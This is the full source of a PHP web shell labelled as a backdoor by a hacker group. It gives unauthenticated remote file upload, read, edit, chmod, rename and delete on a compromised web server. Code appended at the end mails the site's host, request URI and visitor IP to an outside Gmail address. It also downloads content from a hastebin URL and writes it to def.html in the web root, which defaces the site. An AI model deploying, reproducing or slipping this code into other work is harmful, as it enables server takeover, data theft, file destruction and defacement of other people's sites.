_____ _ _
| __ \ | | | |
| | | |_ _ _ | |__| | _____ __
| | | | '__ | __ |/ _ \ \/ /
| |__| | | | | | | __/> <
|_____/|_| |_| |_|\___/_/\_\
Zombi Bot v4 Extra
[+] - 544 Exploit (Mixed)
[+} - Contact :pz[@]hotmail.com
[+} - Last Update :17/05/2018</center>
</pre>
</header>
</form>
<?php
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Dr HeX</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center>Dr HeX</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">File Upload Done Kakak ~_^ .</font><br />';
}else{
echo '<font color="red">File Upload Error ~_~.</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Change Permission Done.</font><br />';
}else{
echo '<font color="red">Change Permission Error.</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Change Name Done.</font><br />';
}else{
echo '<font color="red">Change Name Error.</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Done ~_^.</font><br />';
}else{
echo '<font color="red">Edit File Error ~_~.</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Dir Done.</font><br />';
}else{
echo '<font color="red">Delete Dir Error.</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Done.</font><br />';
}else{
echo '<font color="red">Delete File Error.</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<br />Mr. DellatioNx196 GaLers xh3LL Backd00r <font color="red">1.0</font>, Coded By <font color="red">Mr. DellatioNx196 - Bogor BlackHat</font>
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>
<?php
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = " Bot v4 Rzlt Dr HeX |$ra44";
$email = "salemmokhtar6@gmail.com";
$from = "From: Result<botv4@mrspybotv4.com";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$a45 $b75 $m22";
mail($email, $subj98, $msg8873, $from);
?>
<?php
$check3=$_SERVER['DOCUMENT_ROOT'] . "/def.html" ;
$text3 = http_get('https://hastebin.com/raw/gejoqohenu');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
?>